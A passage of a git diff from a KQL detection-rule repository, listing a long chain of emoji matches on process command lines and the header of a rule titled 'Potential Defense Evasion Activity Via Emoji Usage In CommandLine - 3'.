"🏌🏽‍♂️" or ProcessCommandLine contains "🏄🏽‍♀️" or ProcessCommandLine contains "🏄🏽" or ProcessCommandLine contains "🏄🏽‍♂️" or ProcessCommandLine contains "🚣🏽‍♀️" or ProcessCommandLine contains "🚣🏽" or ProcessCommandLine contains "🚣🏽‍♂️" or ProcessCommandLine contains "🏊🏽‍♀️" or ProcessCommandLine contains "🏊🏽" or ProcessCommandLine contains "🏊🏽‍♂️" or ProcessCommandLine contains "⛹🏽‍♀️" or ProcessCommandLine contains "⛹🏽" or ProcessCommandLine contains "⛹🏽‍♂️" or ProcessCommandLine contains "🏋🏽‍♀️" or ProcessCommandLine contains "🏋🏽" or ProcessCommandLine contains "🏋🏽‍♂️" or ProcessCommandLine contains "🚴🏽‍♀️" or ProcessCommandLine contains "🚴🏽" or ProcessCommandLine contains "🚴🏽‍♂️" or ProcessCommandLine contains "🚵🏽‍♀️" or ProcessCommandLine contains "🚵🏽" or ProcessCommandLine contains "🚵🏽‍♂️" or ProcessCommandLine contains "🤸🏽‍♀️" or ProcessCommandLine contains "🤸🏽" or ProcessCommandLine contains "🤸🏽‍♂️" or ProcessCommandLine contains "🤽🏽‍♀️" or ProcessCommandLine contains "🤽🏽" or ProcessCommandLine contains "🤽🏽‍♂️" or ProcessCommandLine contains "🤾🏽‍♀️" or ProcessCommandLine contains "🤾🏽" or ProcessCommandLine contains "🤾🏽‍♂️" or ProcessCommandLine contains "🤹🏽‍♀️" or ProcessCommandLine contains "🤹🏽" or ProcessCommandLine contains "🤹🏽‍♂️" or ProcessCommandLine contains "🧘🏽‍♀️" or ProcessCommandLine contains "🧘🏽" or ProcessCommandLine contains "🧘🏽‍♂️" or ProcessCommandLine contains "🛀🏽" or ProcessCommandLine contains "🛌🏽" or ProcessCommandLine contains "👋🏾" or ProcessCommandLine contains "🤚🏾" or ProcessCommandLine contains "🖐🏾" or ProcessCommandLine contains "✋🏾" or ProcessCommandLine contains "🖖🏾" or ProcessCommandLine contains "👌🏾" or ProcessCommandLine contains "🤌🏾" or ProcessCommandLine contains "🤏🏾" or ProcessCommandLine contains "✌🏾" or ProcessCommandLine contains "🤞🏾" or ProcessCommandLine contains "🫰🏾" or ProcessCommandLine contains "🤟🏾" or ProcessCommandLine contains "🤘🏾" or ProcessCommandLine contains "🤙🏾" or ProcessCommandLine contains "🫵🏾" or ProcessCommandLine contains "🫱🏾" or ProcessCommandLine contains "🫲🏾" or ProcessCommandLine contains "🫳🏾" or ProcessCommandLine contains "🫴🏾" or ProcessCommandLine contains "👈🏾" or ProcessCommandLine contains "👉🏾" or ProcessCommandLine contains "👆🏾" or ProcessCommandLine contains "🖕🏾" or ProcessCommandLine contains "👇🏾" or ProcessCommandLine contains "☝🏾" or ProcessCommandLine contains "👍🏾" or ProcessCommandLine contains "👎🏾" or ProcessCommandLine contains "✊🏾" or ProcessCommandLine contains "👊🏾" or ProcessCommandLine contains "🤛🏾" or ProcessCommandLine contains "🤜🏾" or ProcessCommandLine contains "👏🏾" or ProcessCommandLine contains "🫶🏾" or ProcessCommandLine contains "🙌🏾" or ProcessCommandLine contains "👐🏾" or ProcessCommandLine contains "🤲🏾" or ProcessCommandLine contains "🙏🏾" or ProcessCommandLine contains "✍🏾" or ProcessCommandLine contains "💪🏾" or ProcessCommandLine contains "🦵🏾" or ProcessCommandLine contains "🦶🏾" or ProcessCommandLine contains "👂🏾" or ProcessCommandLine contains "🦻🏾" or ProcessCommandLine contains "👃🏾" or ProcessCommandLine contains "👶🏾" or ProcessCommandLine contains "👧🏾" or ProcessCommandLine contains "🧒🏾" or ProcessCommandLine contains "👦🏾" or ProcessCommandLine contains "👩🏾" or ProcessCommandLine contains "🧑🏾" or ProcessCommandLine contains "👨🏾" or ProcessCommandLine contains "👩🏾‍🦱" or ProcessCommandLine contains "🧑🏾‍🦱" or ProcessCommandLine contains "👨🏾‍🦱" or ProcessCommandLine contains "👩🏾‍🦰" or ProcessCommandLine contains "🧑🏾‍🦰" or ProcessCommandLine contains "👨🏾‍🦰" or ProcessCommandLine contains "👱🏾‍♀️" or ProcessCommandLine contains "👱🏾" or ProcessCommandLine contains "👱🏾‍♂️" or ProcessCommandLine contains "👩🏾‍🦳" or ProcessCommandLine contains "🧑🏾‍🦳" or ProcessCommandLine contains "👨🏾‍🦳" or ProcessCommandLine contains "👩🏾‍🦲" or ProcessCommandLine contains "🧑🏾‍🦲" or ProcessCommandLine contains "👨🏾‍🦲" or ProcessCommandLine contains "🧔🏾‍♀️" or ProcessCommandLine contains "🧔🏾" or ProcessCommandLine contains "🧔🏾‍♂️" or ProcessCommandLine contains "👵🏾" or ProcessCommandLine contains "🧓🏾" or ProcessCommandLine contains "👴🏾" or ProcessCommandLine contains "👲🏾" or ProcessCommandLine contains "👳🏾‍♀️" or ProcessCommandLine contains "👳🏾" or ProcessCommandLine contains "👳🏾‍♂️" or ProcessCommandLine contains "🧕🏾" or ProcessCommandLine contains "👮🏾‍♀️" or ProcessCommandLine contains "👮🏾" or ProcessCommandLine contains "👮🏾‍♂️" or ProcessCommandLine contains "👷🏾‍♀️" or ProcessCommandLine contains "👷🏾" or ProcessCommandLine contains "👷🏾‍♂️" or ProcessCommandLine contains "💂🏾‍♀️" or ProcessCommandLine contains "💂🏾" or ProcessCommandLine contains "💂🏾‍♂️" or ProcessCommandLine contains "🕵🏾‍♀️" or ProcessCommandLine contains "🕵🏾" or ProcessCommandLine contains "🕵🏾‍♂️" or ProcessCommandLine contains "👩🏾‍⚕️" or ProcessCommandLine contains "🧑🏾‍⚕️" or ProcessCommandLine contains "👨🏾‍⚕️" or ProcessCommandLine contains "👩🏾‍🌾" or ProcessCommandLine contains "🧑🏾‍🌾" or ProcessCommandLine contains "👨🏾‍🌾" or ProcessCommandLine contains "👩🏾‍🍳" or ProcessCommandLine contains "🧑🏾‍🍳" or ProcessCommandLine contains "👨🏾‍🍳" or ProcessCommandLine contains "👩🏾‍🎓" or ProcessCommandLine contains "🧑🏾‍🎓" or ProcessCommandLine contains "👨🏾‍🎓" or ProcessCommandLine contains "👩🏾‍🎤" or ProcessCommandLine contains "🧑🏾‍🎤" or ProcessCommandLine contains "👨🏾‍🎤" or ProcessCommandLine contains "👩🏾‍🏫" or ProcessCommandLine contains "🧑🏾‍🏫" or ProcessCommandLine contains "👨🏾‍🏫" or ProcessCommandLine contains "👩🏾‍🏭" or ProcessCommandLine contains "🧑🏾‍🏭" or ProcessCommandLine contains "👨🏾‍🏭" or ProcessCommandLine contains "👩🏾‍💻" or ProcessCommandLine contains "🧑🏾‍💻" or ProcessCommandLine contains "👨🏾‍💻" or ProcessCommandLine contains "👩🏾‍💼" or ProcessCommandLine contains "🧑🏾‍💼" or ProcessCommandLine contains "👨🏾‍💼" or ProcessCommandLine contains "👩🏾‍🔧" or ProcessCommandLine contains "🧑🏾‍🔧" or ProcessCommandLine contains "👨🏾‍🔧" or ProcessCommandLine contains "👩🏾‍🔬" or ProcessCommandLine contains "🧑🏾‍🔬" or ProcessCommandLine contains "👨🏾‍🔬" or ProcessCommandLine contains "👩🏾‍🎨" or ProcessCommandLine contains "🧑🏾‍🎨" or ProcessCommandLine contains "👨🏾‍🎨" or ProcessCommandLine contains "👩🏾‍🚒" or ProcessCommandLine contains "🧑🏾‍🚒" or ProcessCommandLine contains "👨🏾‍🚒" or ProcessCommandLine contains "👩🏾‍✈️" or ProcessCommandLine contains "🧑🏾‍✈️" or ProcessCommandLine contains "👨🏾‍✈️" or ProcessCommandLine contains "👩🏾‍🚀" or ProcessCommandLine contains "🧑🏾‍🚀" or ProcessCommandLine contains "👨🏾‍🚀" or ProcessCommandLine contains "👩🏾‍⚖️" or ProcessCommandLine contains "🧑🏾‍⚖️" or ProcessCommandLine contains "👨🏾‍⚖️" or ProcessCommandLine contains "👰🏾‍♀️" or ProcessCommandLine contains "👰🏾" or ProcessCommandLine contains "👰🏾‍♂️" or ProcessCommandLine contains "🤵🏾‍♀️" or ProcessCommandLine contains "🤵🏾" or ProcessCommandLine contains "🤵🏾‍♂️" or ProcessCommandLine contains "👸🏾" or ProcessCommandLine contains "🫅🏾" or ProcessCommandLine contains "🤴🏾" or ProcessCommandLine contains "🥷🏾" or ProcessCommandLine contains "🦸🏾‍♀️" or ProcessCommandLine contains "🦸🏾" or ProcessCommandLine contains "🦸🏾‍♂️" or ProcessCommandLine contains "🦹🏾‍♀️" or ProcessCommandLine contains "🦹🏾" or ProcessCommandLine contains "🦹🏾‍♂️" or ProcessCommandLine contains "🤶🏾" or ProcessCommandLine contains "🧑🏾‍🎄" or ProcessCommandLine contains "🎅🏾" or ProcessCommandLine contains "🧙🏾‍♀️" or ProcessCommandLine contains "🧙🏾" or ProcessCommandLine contains "🧙🏾‍♂️" or ProcessCommandLine contains "🧝🏾‍♀️" or ProcessCommandLine contains "🧝🏾" or ProcessCommandLine contains "🧝🏾‍♂️" or ProcessCommandLine contains "🧛🏾‍♀️" or ProcessCommandLine contains "🧛🏾" or ProcessCommandLine contains "🧛🏾‍♂️" or ProcessCommandLine contains "🧜🏾‍♀️" or ProcessCommandLine contains "🧜🏾" or ProcessCommandLine contains "🧜🏾‍♂️" or ProcessCommandLine contains "🧚🏾‍♀️" or ProcessCommandLine contains "🧚🏾" or ProcessCommandLine contains "🧚🏾‍♂️" or ProcessCommandLine contains "👼🏾" or ProcessCommandLine contains "🤰🏾" or ProcessCommandLine contains "🫄🏾" or ProcessCommandLine contains "🫃🏾" or ProcessCommandLine contains "🤱🏾" or ProcessCommandLine contains "👩🏾‍🍼" or ProcessCommandLine contains "🧑🏾‍🍼" or ProcessCommandLine contains "👨🏾‍🍼" or ProcessCommandLine contains "🙇🏾‍♀️" or ProcessCommandLine contains "🙇🏾" or ProcessCommandLine contains "🙇🏾‍♂️" or ProcessCommandLine contains "💁🏾‍♀️" or ProcessCommandLine contains "💁🏾" or ProcessCommandLine contains "💁🏾‍♂️" or ProcessCommandLine contains "🙅🏾‍♀️" or ProcessCommandLine contains "🙅🏾" or ProcessCommandLine contains "🙅🏾‍♂️" or ProcessCommandLine contains "🙆🏾‍♀️" or ProcessCommandLine contains "🙆🏾" or ProcessCommandLine contains "🙆🏾‍♂️" or ProcessCommandLine contains "🙋🏾‍♀️" or ProcessCommandLine contains "🙋🏾" or ProcessCommandLine contains "🙋🏾‍♂️" or ProcessCommandLine contains "🧏🏾‍♀️" or ProcessCommandLine contains "🧏🏾" or ProcessCommandLine contains "🧏🏾‍♂️" or ProcessCommandLine contains "🤦🏾‍♀️" or ProcessCommandLine contains "🤦🏾" or ProcessCommandLine contains "🤦🏾‍♂️" or ProcessCommandLine contains "🤷🏾‍♀️" or ProcessCommandLine contains "🤷🏾" or ProcessCommandLine contains "🤷🏾‍♂️" or ProcessCommandLine contains "🙎🏾‍♀️" or ProcessCommandLine contains "🙎🏾" or ProcessCommandLine contains "🙎🏾‍♂️" or ProcessCommandLine contains "🙍🏾‍♀️" or ProcessCommandLine contains "🙍🏾" or ProcessCommandLine contains "🙍🏾‍♂️" or ProcessCommandLine contains "💇🏾‍♀️" or ProcessCommandLine contains "💇🏾" or ProcessCommandLine contains "💇🏾‍♂️" or ProcessCommandLine contains "💆🏾‍♀️" or ProcessCommandLine contains "💆🏾" or ProcessCommandLine contains "💆🏾‍♂️" or ProcessCommandLine contains "🧖🏾‍♀️" or ProcessCommandLine contains "🧖🏾" or ProcessCommandLine contains "🧖🏾‍♂️" or ProcessCommandLine contains "💃🏾" or ProcessCommandLine contains "🕺🏾" or ProcessCommandLine contains "👩🏾‍🦽" or ProcessCommandLine contains "🧑🏾‍🦽" or ProcessCommandLine contains "👨🏾‍🦽" or ProcessCommandLine contains "👩🏾‍🦼" or ProcessCommandLine contains "🧑🏾‍🦼" or ProcessCommandLine contains "👨🏾‍🦼" or ProcessCommandLine contains "🚶🏾‍♀️" or ProcessCommandLine contains "🚶🏾" or ProcessCommandLine contains "🚶🏾‍♂️" or ProcessCommandLine contains "👩🏾‍🦯" or ProcessCommandLine contains "🧑🏾‍🦯" or ProcessCommandLine contains "👨🏾‍🦯" or ProcessCommandLine contains "🧎🏾‍♀️" or ProcessCommandLine contains "🧎🏾" or ProcessCommandLine contains "🧎🏾‍♂️" or ProcessCommandLine contains "🏃🏾‍♀️" or ProcessCommandLine contains "🏃🏾" or ProcessCommandLine contains "🏃🏾‍♂️" or ProcessCommandLine contains "🧍🏾‍♀️" or ProcessCommandLine contains "🧍🏾" or ProcessCommandLine contains "🧍🏾‍♂️" or ProcessCommandLine contains "👭🏾" or ProcessCommandLine contains "🧑🏾‍🤝‍🧑🏾" or ProcessCommandLine contains "👬🏾" or ProcessCommandLine contains "👫🏾" or ProcessCommandLine contains "🧗🏾‍♀️" or ProcessCommandLine contains "🧗🏾" or ProcessCommandLine contains "🧗🏾‍♂️" or ProcessCommandLine contains "🏇🏾" or ProcessCommandLine contains "🏂🏾" or ProcessCommandLine contains "🏌🏾‍♀️" or ProcessCommandLine contains "🏌🏾" or ProcessCommandLine contains "🏌🏾‍♂️" or ProcessCommandLine contains "🏄🏾‍♀️" or ProcessCommandLine contains "🏄🏾" or ProcessCommandLine contains "🏄🏾‍♂️" or ProcessCommandLine contains "🚣🏾‍♀️" or ProcessCommandLine contains "🚣🏾" or ProcessCommandLine contains "🚣🏾‍♂️" or ProcessCommandLine contains "🏊🏾‍♀️" or ProcessCommandLine contains "🏊🏾" or ProcessCommandLine contains "🏊🏾‍♂️" or ProcessCommandLine contains "⛹🏾‍♀️" or ProcessCommandLine contains "⛹🏾" or ProcessCommandLine contains "⛹🏾‍♂️" or ProcessCommandLine contains "🏋🏾‍♀️" or ProcessCommandLine contains "🏋🏾" or ProcessCommandLine contains "🏋🏾‍♂️" or ProcessCommandLine contains "🚴🏾‍♀️" or ProcessCommandLine contains "🚴🏾" or ProcessCommandLine contains "🚴🏾‍♂️" or ProcessCommandLine contains "🚵🏾‍♀️" or ProcessCommandLine contains "🚵🏾" or ProcessCommandLine contains "🚵🏾‍♂️" or ProcessCommandLine contains "🤸🏾‍♀️" or ProcessCommandLine contains "🤸🏾" or ProcessCommandLine contains "🤸🏾‍♂️" or ProcessCommandLine contains "🤽🏾‍♀️" or ProcessCommandLine contains "🤽🏾" or ProcessCommandLine contains "🤽🏾‍♂️" or ProcessCommandLine contains "🤾🏾‍♀️" or ProcessCommandLine contains "🤾🏾" or ProcessCommandLine contains "🤾🏾‍♂️" or ProcessCommandLine contains "🤹🏾‍♀️" or ProcessCommandLine contains "🤹🏾" or ProcessCommandLine contains "🤹🏾‍♂️" or ProcessCommandLine contains "🧘🏾‍♀️" or ProcessCommandLine contains "🧘🏾" or ProcessCommandLine contains "🧘🏾‍♂️" or ProcessCommandLine contains "🛀🏾" or ProcessCommandLine contains "🛌🏾" or ProcessCommandLine contains "👋🏿" or ProcessCommandLine contains "🤚🏿" or ProcessCommandLine contains "🖐🏿" or ProcessCommandLine contains "✋🏿" or ProcessCommandLine contains "🖖🏿" or ProcessCommandLine contains "👌🏿" or ProcessCommandLine contains "🤌🏿" or ProcessCommandLine contains "🤏🏿" or ProcessCommandLine contains "✌🏿" or ProcessCommandLine contains "🤞🏿" or ProcessCommandLine contains "🫰🏿" or ProcessCommandLine contains "🤟🏿" or ProcessCommandLine contains "🤘🏿" or ProcessCommandLine contains "🤙🏿" or ProcessCommandLine contains "🫵🏿" or ProcessCommandLine contains "🫱🏿" or ProcessCommandLine contains "🫲🏿" or ProcessCommandLine contains "🫳🏿" or ProcessCommandLine contains "🫴🏿" or ProcessCommandLine contains "👈🏿" or ProcessCommandLine contains "👉🏿" or ProcessCommandLine contains "👆🏿" or ProcessCommandLine contains "🖕🏿" or ProcessCommandLine contains "👇🏿" or ProcessCommandLine contains "☝🏿" or ProcessCommandLine contains "👍🏿" or ProcessCommandLine contains "👎🏿" or ProcessCommandLine contains "✊🏿" or ProcessCommandLine contains "👊🏿" or ProcessCommandLine contains "🤛🏿" or ProcessCommandLine contains "🤜🏿" or ProcessCommandLine contains "👏🏿" or ProcessCommandLine contains "🫶🏿" or ProcessCommandLine contains "🙌🏿" or ProcessCommandLine contains "👐🏿" or ProcessCommandLine contains "🤲🏿" or ProcessCommandLine contains "🙏🏿" or ProcessCommandLine contains "✍🏿" or ProcessCommandLine contains "🤳🏿" or ProcessCommandLine contains "💪🏿" or ProcessCommandLine contains "🦵🏿" or ProcessCommandLine contains "🦶🏿" or ProcessCommandLine contains "👂🏿" or ProcessCommandLine contains "🦻🏿" or ProcessCommandLine contains "👃🏿" or ProcessCommandLine contains "👶🏿" or ProcessCommandLine contains "👧🏿" or ProcessCommandLine contains "🧒🏿" or ProcessCommandLine contains "👦🏿" or ProcessCommandLine contains "👩🏿" or ProcessCommandLine contains "🧑🏿" or ProcessCommandLine contains "👨🏿" or ProcessCommandLine contains "👩🏿‍🦱" or ProcessCommandLine contains "🧑🏿‍🦱" or ProcessCommandLine contains "👨🏿‍🦱" or ProcessCommandLine contains "👩🏿‍🦰" or ProcessCommandLine contains "🧑🏿‍🦰" or ProcessCommandLine contains "👨🏿‍🦰" or ProcessCommandLine contains "👱🏿‍♀️" or ProcessCommandLine contains "👱🏿" or ProcessCommandLine contains "👱🏿‍♂️" or ProcessCommandLine contains "👩🏿‍🦳" or ProcessCommandLine contains "🧑🏿‍🦳" or ProcessCommandLine contains "👨🏿‍🦳" or ProcessCommandLine contains "👩🏿‍🦲" or ProcessCommandLine contains "🧑🏿‍🦲" or ProcessCommandLine contains "👨🏿‍🦲" or ProcessCommandLine contains "🧔🏿‍♀️" or ProcessCommandLine contains "🧔🏿" or ProcessCommandLine contains "🧔🏿‍♂️" or ProcessCommandLine contains "👵🏿" or ProcessCommandLine contains "🧓🏿" or ProcessCommandLine contains "👴🏿" or ProcessCommandLine contains "👲🏿" or ProcessCommandLine contains "👳🏿‍♀️" or ProcessCommandLine contains "👳🏿" or ProcessCommandLine contains "👳🏿‍♂️" or ProcessCommandLine contains "🧕🏿" or ProcessCommandLine contains "👮🏿‍♀️" or ProcessCommandLine contains "👮🏿" or ProcessCommandLine contains "👮🏿‍♂️" or ProcessCommandLine contains "👷🏿‍♀️" or ProcessCommandLine contains "👷🏿" or ProcessCommandLine contains "👷🏿‍♂️" or ProcessCommandLine contains "💂🏿‍♀️" or ProcessCommandLine contains "💂🏿" or ProcessCommandLine contains "💂🏿‍♂️" or ProcessCommandLine contains "🕵🏿‍♀️" or ProcessCommandLine contains "🕵🏿" or ProcessCommandLine contains "🕵🏿‍♂️" or ProcessCommandLine contains "👩🏿‍⚕️" or ProcessCommandLine contains "🧑🏿‍⚕️" or ProcessCommandLine contains "👨🏿‍⚕️" or ProcessCommandLine contains "👩🏿‍🌾" or ProcessCommandLine contains "🧑🏿‍🌾" or ProcessCommandLine contains "👨🏿‍🌾" or ProcessCommandLine contains "👩🏿‍🍳" or ProcessCommandLine contains "🧑🏿‍🍳" or ProcessCommandLine contains "👨🏿‍🍳" or ProcessCommandLine contains "👩🏿‍🎓" or ProcessCommandLine contains "🧑🏿‍🎓" or ProcessCommandLine contains "👨🏿‍🎓" or ProcessCommandLine contains "👩🏿‍🎤" or ProcessCommandLine contains "🧑🏿‍🎤" or ProcessCommandLine contains "👨🏿‍🎤" or ProcessCommandLine contains "👩🏿‍🏫" or ProcessCommandLine contains "🧑🏿‍🏫" or ProcessCommandLine contains "👨🏿‍🏫" or ProcessCommandLine contains "👩🏿‍🏭" or ProcessCommandLine contains "🧑🏿‍🏭" or ProcessCommandLine contains "👨🏿‍🏭" or ProcessCommandLine contains "👩🏿‍💻" or ProcessCommandLine contains "🧑🏿‍💻" or ProcessCommandLine contains "👨🏿‍💻" or ProcessCommandLine contains "👩🏿‍💼" or ProcessCommandLine contains "🧑🏿‍💼" or ProcessCommandLine contains "👨🏿‍💼" or ProcessCommandLine contains "👩🏿‍🔧" or ProcessCommandLine contains "🧑🏿‍🔧" or ProcessCommandLine contains "👨🏿‍🔧" or ProcessCommandLine contains "👩🏿‍🔬" or ProcessCommandLine contains "🧑🏿‍🔬" or ProcessCommandLine contains "👨🏿‍🔬" or ProcessCommandLine contains "👩🏿‍🎨" or ProcessCommandLine contains "🧑🏿‍🎨" or ProcessCommandLine contains "👨🏿‍🎨" or ProcessCommandLine contains "👩🏿‍🚒" or ProcessCommandLine contains "🧑🏿‍🚒" or ProcessCommandLine contains "👨🏿‍🚒" or ProcessCommandLine contains "👩🏿‍✈️" or ProcessCommandLine contains "🧑🏿‍✈️" or ProcessCommandLine contains "👨🏿‍✈️" or ProcessCommandLine contains "👩🏿‍🚀" or ProcessCommandLine contains "🧑🏿‍🚀" or ProcessCommandLine contains "👨🏿‍🚀" or ProcessCommandLine contains "👩🏿‍⚖️" or ProcessCommandLine contains "🧑🏿‍⚖️" or ProcessCommandLine contains "👨🏿‍⚖️" or ProcessCommandLine contains "👰🏿‍♀️" or ProcessCommandLine contains "👰🏿" or ProcessCommandLine contains "👰🏿‍♂️" or ProcessCommandLine contains "🤵🏿‍♀️" or ProcessCommandLine contains "🤵🏿" or ProcessCommandLine contains "🤵🏿‍♂️" or ProcessCommandLine contains "👸🏿" or ProcessCommandLine contains "🫅🏿" or ProcessCommandLine contains "🤴🏿" or ProcessCommandLine contains "🥷🏿" or ProcessCommandLine contains "🦸🏿‍♀️" or ProcessCommandLine contains "🦸🏿" or ProcessCommandLine contains "🦸🏿‍♂️" or ProcessCommandLine contains "🦹🏿‍♀️" or ProcessCommandLine contains "🦹🏿" or ProcessCommandLine contains "🦹🏿‍♂️" or ProcessCommandLine contains "🤶🏿" or ProcessCommandLine contains "🧑🏿‍🎄" or ProcessCommandLine contains "🎅🏿" or ProcessCommandLine contains "🧙🏿‍♀️" or ProcessCommandLine contains "🧙🏿" or ProcessCommandLine contains "🧙🏿‍♂️" or ProcessCommandLine contains "🧝🏿‍♀️" or ProcessCommandLine contains "🧝🏿" or ProcessCommandLine contains "🧝🏿‍♂️" or ProcessCommandLine contains "🧛🏿‍♀️" or ProcessCommandLine contains "🧛🏿" or ProcessCommandLine contains "🧛🏿‍♂️" or ProcessCommandLine contains "🧜🏿‍♀️" or ProcessCommandLine contains "🧜🏿" or ProcessCommandLine contains "🧜🏿‍♂️" or ProcessCommandLine contains "🧚🏿‍♀️" or ProcessCommandLine contains "🧚🏿" or ProcessCommandLine contains "🧚🏿‍♂️" or ProcessCommandLine contains "👼🏿" or ProcessCommandLine contains "🤰🏿" or ProcessCommandLine contains "🫄🏿" or ProcessCommandLine contains "🫃🏿" or ProcessCommandLine contains "🤱🏿" or ProcessCommandLine contains "👩🏿‍🍼" or ProcessCommandLine contains "🧑🏿‍🍼" or ProcessCommandLine contains "👨🏿‍🍼" or ProcessCommandLine contains "🙇🏿‍♀️" or ProcessCommandLine contains "🙇🏿" or ProcessCommandLine contains "🙇🏿‍♂️" or ProcessCommandLine contains "💁🏿‍♀️" or ProcessCommandLine contains "💁🏿" or ProcessCommandLine contains "💁🏿‍♂️" or ProcessCommandLine contains "🙅🏿‍♀️" or ProcessCommandLine contains "🙅🏿" or ProcessCommandLine contains "🙅🏿‍♂️" or ProcessCommandLine contains "🙆🏿‍♀️" or ProcessCommandLine contains "🙆🏿" or ProcessCommandLine contains "🙆🏿‍♂️" or ProcessCommandLine contains "🙋🏿‍♀️" or ProcessCommandLine contains "🙋🏿" or ProcessCommandLine contains "🙋🏿‍♂️" or ProcessCommandLine contains "🧏🏿‍♀️" or ProcessCommandLine contains "🧏🏿" or ProcessCommandLine contains "🧏🏿‍♂️" or ProcessCommandLine contains "🤦🏿‍♀️" or ProcessCommandLine contains "🤦🏿" or ProcessCommandLine contains "🤦🏿‍♂️" or ProcessCommandLine contains "🤷🏿‍♀️" or ProcessCommandLine contains "🤷🏿" or ProcessCommandLine contains "🤷🏿‍♂️" or ProcessCommandLine contains "🙎🏿‍♀️" or ProcessCommandLine contains "🙎🏿" or ProcessCommandLine contains "🙎🏿‍♂️" or ProcessCommandLine contains "🙍🏿‍♀️" or ProcessCommandLine contains "🙍🏿" or ProcessCommandLine contains "🙍🏿‍♂️" or ProcessCommandLine contains "💇🏿‍♀️" or ProcessCommandLine contains "💇🏿" or ProcessCommandLine contains "💇🏿‍♂️" or ProcessCommandLine contains "💆🏿‍♀️" or ProcessCommandLine contains "💆🏿" or ProcessCommandLine contains "💆🏿‍♂️" or ProcessCommandLine contains "🧖🏿‍♀️" or ProcessCommandLine contains "🧖🏿" or ProcessCommandLine contains "🧖🏿‍♂️" or ProcessCommandLine contains "💃🏿" or ProcessCommandLine contains "🕺🏿" or ProcessCommandLine contains "🕴🏿" or ProcessCommandLine contains "👩🏿‍🦽" or ProcessCommandLine contains "🧑🏿‍🦽" or ProcessCommandLine contains "👨🏿‍🦽" or ProcessCommandLine contains "👩🏿‍🦼" or ProcessCommandLine contains "🧑🏿‍🦼" or ProcessCommandLine contains "👨🏿‍🦼" or ProcessCommandLine contains "🚶🏿‍♀️" or ProcessCommandLine contains "🚶🏿" or ProcessCommandLine contains "🚶🏿‍♂️" or ProcessCommandLine contains "👩🏿‍🦯" or ProcessCommandLine contains "🧑🏿‍🦯" or ProcessCommandLine contains "👨🏿‍🦯" or ProcessCommandLine contains "🧎🏿‍♀️" or ProcessCommandLine contains "🧎🏿" or ProcessCommandLine contains "🧎🏿‍♂️" or ProcessCommandLine contains "🏃🏿‍♀️" or ProcessCommandLine contains "🏃🏿" or ProcessCommandLine contains "🏃🏿‍♂️" or ProcessCommandLine contains "🧍🏿‍♀️" or ProcessCommandLine contains "🧍🏿" or ProcessCommandLine contains "🧍🏿‍♂️" or ProcessCommandLine contains "👭🏿" or ProcessCommandLine contains "🧑🏿‍🤝‍🧑🏿" or ProcessCommandLine contains "👬🏿" or ProcessCommandLine contains "👫🏿" or ProcessCommandLine contains "🧗🏿‍♀️" or ProcessCommandLine contains "🧗🏿" or ProcessCommandLine contains "🧗🏿‍♂️" or ProcessCommandLine contains "🏇🏿" or ProcessCommandLine contains "🏂🏿" or ProcessCommandLine contains "🏌🏿‍♀️" or ProcessCommandLine contains "🏌🏿" or ProcessCommandLine contains "🏌🏿‍♂️" or ProcessCommandLine contains "🏄🏿‍♀️" or ProcessCommandLine contains "🏄🏿" or ProcessCommandLine contains "🏄🏿‍♂️" or ProcessCommandLine contains "🚣🏿‍♀️" or ProcessCommandLine contains "🚣🏿" or ProcessCommandLine contains "🚣🏿‍♂️" or ProcessCommandLine contains "🏊🏿‍♀️" or ProcessCommandLine contains "🏊🏿" or ProcessCommandLine contains "🏊🏿‍♂️" or ProcessCommandLine contains "⛹🏿‍♀️" or ProcessCommandLine contains "⛹🏿" or ProcessCommandLine contains "⛹🏿‍♂️" or ProcessCommandLine contains "🏋🏿‍♀️" or ProcessCommandLine contains "🏋🏿" or ProcessCommandLine contains "🏋🏿‍♂️" or ProcessCommandLine contains "🚴🏿‍♀️" or ProcessCommandLine contains "🚴🏿" or ProcessCommandLine contains "🚴🏿‍♂️" or ProcessCommandLine contains "🚵🏿‍♀️" or ProcessCommandLine contains "🚵🏿" or ProcessCommandLine contains "🚵🏿‍♂️" or ProcessCommandLine contains "🤸🏿‍♀️" or ProcessCommandLine contains "🤸🏿" or ProcessCommandLine contains "🤸🏿‍♂️" or ProcessCommandLine contains "🤽🏿‍♀️" or ProcessCommandLine contains "🤽🏿" or ProcessCommandLine contains "🤽🏿‍♂️" or ProcessCommandLine contains "🤾🏿‍♀️" or ProcessCommandLine contains "🤾🏿" or ProcessCommandLine contains "🤾🏿‍♂️" or ProcessCommandLine contains "🤹🏿‍♀️" or ProcessCommandLine contains "🤹🏿" or ProcessCommandLine contains "🤹🏿‍♂️" or ProcessCommandLine contains "🧘🏿‍♀️" or ProcessCommandLine contains "🧘🏿" or ProcessCommandLine contains "🧘🏿‍♂️" or ProcessCommandLine contains "🛀🏿" or ProcessCommandLine contains "🛌🏿" or ProcessCommandLine contains "🐶" or ProcessCommandLine contains "🐱" or ProcessCommandLine contains "🐭" or ProcessCommandLine contains "🐹" or ProcessCommandLine contains "🐰" or ProcessCommandLine contains "🦊" or ProcessCommandLine contains "🐻" or ProcessCommandLine contains "🐼" or ProcessCommandLine contains "🐻‍❄️" or ProcessCommandLine contains "🐨" or ProcessCommandLine contains "🐯" or ProcessCommandLine contains "🦁" or ProcessCommandLine contains "🐮" or ProcessCommandLine contains "🐷" or ProcessCommandLine contains "🐽" or ProcessCommandLine contains "🐸" or ProcessCommandLine contains "🐵" or ProcessCommandLine contains "🙈" or ProcessCommandLine contains "🙉" or ProcessCommandLine contains "🙊" or ProcessCommandLine contains "🐒" or ProcessCommandLine contains "🐔" or ProcessCommandLine contains "🐧" or ProcessCommandLine contains "🐦" or ProcessCommandLine contains "🐤" or ProcessCommandLine contains "🐣" or ProcessCommandLine contains "🐥" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql index 139776a1..4c0221ee 100644 --- a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql +++ b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql @@ -1,10 +1,10 @@ -// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3 -// Author: @Kostastsale, TheDFIRReport -// Date: 2022-12-05 -// Level: high -// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3 +// Author: @Kostastsale, TheDFIRReport +// Date: 2022-12-05 +// Level: 